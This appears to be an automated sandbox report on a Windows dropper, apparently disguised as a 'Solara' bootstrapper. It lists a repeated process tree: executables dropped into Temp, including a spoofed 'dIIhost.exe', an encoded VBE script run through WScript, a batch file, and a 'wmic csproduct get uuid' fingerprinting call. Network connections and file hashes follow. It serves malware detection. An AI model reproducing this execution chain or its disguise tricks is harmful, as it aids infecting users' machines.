C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
Files
memory/1928-0-0x000007FEF5953000-0x000007FEF5954000-memory.dmp
memory/1928-1-0x0000000000C60000-0x0000000000FBC000-memory.dmp
memory/1928-4-0x000007FEF5950000-0x000007FEF633C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
| MD5 | 084ab0f114778618e30666e451581845 |
| SHA1 | 0013eacb10d1f89dff71296defa5db17704d3347 |
| SHA256 | 8cf0041d9b5a8ab1fa037c475de20ba1389711d9d4e80fb9638138840f28c649 |
| SHA512 | 0c20196d8810e5c05c1b0b284804c7aa5f05a41bdcf19eb3c983702f8b176fb6e4000e3b3b2ec1da9f8973c9bc0feca9e4446817731104d174c0ba1fdd85cd06 |
memory/1636-13-0x000007FEF5950000-0x000007FEF633C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
| MD5 | c05f91c69a98089ded3951424da86771 |
| SHA1 | 0c4c6437efad5f0e1e3e290fb0a9c069cd4a86ed |
| SHA256 | 94c820d3a1216c2ea30f7960f60d8324399a522d3e090711aafc6f5d0b860ac5 |
| SHA512 | 3ba5631dcc8b839ec1d75a408b10047c3a6713791caa5b7d0fa4df69fcd264df50424404d410727c532de77fc95c082faad3cebae1637c87a146c9bf5979fcc7 |
memory/1996-17-0x0000000001250000-0x0000000001290000-memory.dmp
memory/1636-16-0x0000000001140000-0x00000000012F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
| MD5 | 97bec430634bb8e59d4273c9a395a702 |
| SHA1 | a8a04f26cec00ef32501ebe35252d08aaa7e3634 |
| SHA256 | 57a2fe6374ced2c9c7e2be59d3eca0815188778308e59295d6a868d3e5c4237e |
| SHA512 | 8563d6608337071a89f7b0b7739001a456be19c51dea0f715317c6dbfce9986c59527f39ec7cdcc71007abdd8955996d26835105712e80cd700e086b8d1165a9 |
memory/1928-21-0x000007FEF5950000-0x000007FEF633C000-memory.dmp
C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe
| MD5 | fb6995d84ff8765f8985b39021495a02 |
| SHA1 | da911e465774c0769bc5b6fb10801c08e769b607 |
| SHA256 | 048d54b81f8126090f61d30d736d677fe62a4eb683b5a7618c91020e7fc10ff5 |
